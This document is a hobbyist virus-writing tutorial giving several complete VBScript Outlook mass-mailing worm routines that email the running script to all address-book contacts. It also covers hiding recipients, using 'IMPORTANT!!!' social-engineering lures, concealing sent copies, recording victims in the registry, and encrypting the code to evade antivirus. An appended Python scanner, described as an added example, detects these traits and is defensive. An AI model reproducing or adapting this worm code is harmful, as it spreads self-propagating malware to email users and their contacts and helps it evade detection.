Some VBScript Outlook-worm techniques by Zed
Most VBScript worms these days spread using Microsoft Outlook. The Outlook mass-emailing code is one of the best ways for your worm to spread, but this code is easily detected, so I recommend modifying it a little :) Here is a very basic code that emails all of the contacts located in the address book (this is called a mass-mailer).

-----------------------------------------------------------------
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
  Set GNS = OutlookApp.GetNameSpace("MAPI")
  For SearchList = 1 To GNS.AddressLists.Count
    CountLoop = 1
    Set OutlookEmail = OutlookApp.CreateItem(0)
    For SearchEmails = 1 To GNS.AddressLists(SearchList).AddressEntries.Count
      OutlookEmail.Recipients.Add GNS.AddressLists(SearchList).AddressEntries(CountLoop)
      CountLoop = CountLoop + 1
    Next
    OutlookEmail.Subject = "Check this out!"
    OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
    OutlookEmail.Attachments.Add WScript.ScriptFullName
    OutlookEmail.DeleteAfterSubmit = True
    OutlookEmail.Send
  Next
End If
-----------------------------------------------------------------

Of course, this little code should be detected by any modern-day virus scanner, so there is an obvious problem in the detection of this code - so try methods like encryption, and alike :)

But this code above is just a basic mass-mailer, and is not very efficient, because it shows all of the people that it has emailed itself to in the message. For example, the worm finds Bob in the address book, and emails him the worm. Let's just say that Bob's email address was Bob@Smtpserv.com.au, and the code above was used as the worm's mass-mail component.
When Bob reads the worm's email, the "To:" column in the email will be filled with other people's email addresses that were taken from the victim's address book, thus, the email will look something like this:

-----------------------------------------------------------------
To: contact@Freepcs.com; anothercontact@Homeweb.net; contact2@stuff021709.com; Bob@Smtpserv.com.au; Jimmy349234@Yahoopages.com; Email323@Smtpserv.com.au;
Subject: Check this out!
-----------------------------------------------------------------

So as you see, other emails that were taken from the address book can be seen in the email, which is pretty crap because people will know that the email was sent to other people besides themselves. So why not stop this? I mean, there is a way to "hide" these other emails so that they do not appear in the sent email messages. Here is the code on how to do this:

-----------------------------------------------------------------
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
  For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
    For UserGroup = 1 To ContactSwitch.AddressEntries.Count
      Set OutlookEmail = OutlookApp.CreateItem(0)
      OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
      OutlookEmail.Subject = "Check this out!"
      OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
      OutlookEmail.Attachments.Add WScript.ScriptFullName
      OutlookEmail.DeleteAfterSubmit = True
      OutlookEmail.Send
    Next
  Next
End If
-----------------------------------------------------------------

So as I said before, this code is far more effective for mass-mailing because it doesn't show the other contacts it has emailed itself to.
For example, if Sarah had a VBScript worm using this email routine above, and she was silly enough to open it, and it went through her Outlook address book and found and sent itself to the following emails:

Bob@Smtpserv.com.au
John@Email143534.com
James@Squarebobspongepants.net
Graham@Squarebobspongepants.net
Tony@Squarebobspongepants.net
Jessica@Free_Email546456.com

The email would look like this to any of the people that the worm sent itself to:

-----------------------------------------------------------------
To:
Subject: Check this out!
-----------------------------------------------------------------

Hehehe... the user who reads this email does not know that this message was sent to lots of other people, instead, this email looks like it was just sent to this person only.

Tehehe... I'm not finished yet! There are some more tricks that I stumbled across, the next one that I'm going to explain is email importance. In Outlook, there is a thing called "Email Importance", which basically means that you can set the importance of the email that you are sending. An email that is received with a high importance would have a "[!]" mark on the left side of the email... Which just says that the email is important :) Here is a description for email importance codes:

-----------------------------------------------------------------
OutlookEmail.Importance = 2 ' High importance :)
OutlookEmail.Importance = 1 ' Normal (default) importance
OutlookEmail.Importance = 0 ' Low importance
-----------------------------------------------------------------

So my point is, by adding the high-importance code to the mass-mailing routine, all of the worm's sent emails will be sent with high importance, thus some people will be tricked into thinking the email is important.
Here is a mass-mail code that uses the importance thingo:

-----------------------------------------------------------------
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
  For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
    For UserGroup = 1 To ContactSwitch.AddressEntries.Count
      Set OutlookEmail = OutlookApp.CreateItem(0)
      OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
      OutlookEmail.Subject = "IMPORTANT!!!"
      OutlookEmail.Body = "This file is important and should be opened now."
      OutlookEmail.Attachments.Add WScript.ScriptFullName
      OutlookEmail.Importance = 2
      OutlookEmail.DeleteAfterSubmit = True
      OutlookEmail.Send
    Next
  Next
End If
-----------------------------------------------------------------

Hehehe... so all emails sent by the code above would look like this to the email recipient(s):

-----------------------------------------------------------------
To:
Subject: [!] IMPORTANT!!!
-----------------------------------------------------------------

Marvelous... so now you should know a bit about email importance...

There is just another problem with using all of the codes that I have shown you so far... The problem is that whenever the worm is executed (opened), it will email itself again, and it will always email itself whenever it is executed... So the people in the address book will be "spammed" with the same email message over and over again. There is a way to stop this, so that the worm only emails itself once to every user in the address book.
Here is the code on how to do this:

-----------------------------------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
  For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
    For UserGroup = 1 To ContactSwitch.AddressEntries.Count
      EmailKey = "HKEY_CURRENT_USER\Software\VBSWorm\RecordContacts\"
      ReadIfSent = wsc.RegRead(EmailKey & ContactSwitch.AddressEntries(UserGroup))
      If ReadIfSent <> "Email Sent" Then
        Set OutlookEmail = OutlookApp.CreateItem(0)
        OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
        OutlookEmail.Subject = "IMPORTANT!!!"
        OutlookEmail.Body = "This file is important and should be opened now."
        OutlookEmail.Attachments.Add WScript.ScriptFullName
        OutlookEmail.Importance = 2
        OutlookEmail.DeleteAfterSubmit = True
        OutlookEmail.Send
        wsc.RegWrite EmailKey & ContactSwitch.AddressEntries(UserGroup), "Email Sent"
      End If
    Next
  Next
End If
-----------------------------------------------------------------

Tehehe... This code is really the same as the previous one that uses importance, but it will only send the emails once to everyone in the address book, because the worm keeps a "Record" of who it has sent itself to.

There is just one more thing about mass-mailing that I will show you before I go. I am going to explain how to make the worm email itself to only a certain number of contacts in the address book. Here is a code that will email itself to the first 999 people in the address book. Also note that it doesn't matter if the user doesn't have 999 contacts...
It just means that the worm will email itself to a maximum of 999 people :) Anyway, here is the code:

-----------------------------------------------------------------
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
  Set GNS = OutlookApp.GetNameSpace("MAPI")
  For List1 = 1 To GNS.AddressLists.Count
    CountLoop = 1
    For ListCount = 1 To GNS.AddressLists(List1).AddressEntries.Count
      If CountLoop > 999 Then
        ListCount = GNS.AddressLists(List1).AddressEntries.Count
      End If
      Set OutlookEmail = OutlookApp.CreateItem(0)
      OutlookEmail.Recipients.Add GNS.AddressLists(List1).AddressEntries(CountLoop)
      OutlookEmail.Subject = "Hello"
      OutlookEmail.Body = "Look at the attachments!"
      OutlookEmail.Attachments.Add WScript.ScriptFullName
      OutlookEmail.DeleteAfterSubmit = True
      OutlookEmail.Send
      CountLoop = CountLoop + 1
    Next
  Next
End If
-----------------------------------------------------------------

Hehehe... So this code above will email itself to a maximum of 999 email addresses that are found in the Outlook address book.

Well, that's just about all I can think of for Outlook worm codes :) If you have any questions or whatever, you can email me.
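
Seen from the scanning side, every routine above leaves the same fingerprints in the script text: Outlook automation, an address-book walk, the script attaching itself, and DeleteAfterSubmit hiding the sent copy. The static scanner below is an added example, not part of the original article; the indicator names, weights and both sample strings are assumptions constructed for illustration.

```python
import re

# Behaviours taken from the routines on this page: (name, regex, weight).
INDICATORS = [
    ("outlook_automation", r'createobject\(\s*"outlook\.application"\s*\)', 1),
    ("address_book_walk", r'\.addresslists\b.*?\.addressentries\b', 2),
    ("self_attachment", r'\.attachments\.add[\s(]+wscript\.scriptfullname', 3),
    ("hide_sent_copy", r'\.deleteaftersubmit\s*=\s*true', 2),
    ("send_in_loop", r'\bfor\b.*?\.send\b.*?\bnext\b', 1),
    ("registry_marker", r'\.regwrite\b', 1),
]

def normalize(src):
    """Undo trivial layout differences before matching."""
    src = re.sub(r'[ \t]+_[ \t]*\r?\n', ' ', src)      # join "_" line continuations
    src = re.sub(r'"\s*&\s*"', '', src)                # "Out" & "look" -> "Outlook"
    src = re.sub(r"^\s*(?:'|rem\b).*$", '', src, flags=re.I | re.M)  # comment lines
    return src.lower()

def scan(src):
    """Return matched indicators, weighted score and a verdict for one script."""
    text = normalize(src)
    hits = [name for name, rx, _ in INDICATORS if re.search(rx, text, re.S)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A script that attaches itself AND harvests recipients is self-propagating mail.
    if "self_attachment" in hits and "address_book_walk" in hits:
        verdict = "mass-mailer"
    else:
        verdict = "review" if score >= 3 else "clean"
    return {"hits": hits, "score": score, "verdict": verdict}

# Constructed samples: SUSPECT is abridged from the page's second routine,
# BENIGN is an ordinary report-mailing admin script.
SUSPECT = '''Set OutlookApp = CreateObject("Outlook.Application")
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
' ... message construction elided ...
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
Next'''
BENIGN = '''Set app = CreateObject("Outlook.Application")
Set msg = app.CreateItem(0)
msg.Recipients.Add "ops@example.com"
msg.Attachments.Add "C:\\Reports\\backup.log"
msg.Send'''

if __name__ == "__main__":
    for label, sample in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(label, scan(sample))
```

Plain-text matching like this stops working once the script body is encoded, so pair it with run-time script inspection such as AMSI and with attachment-type blocking at the mail gateway.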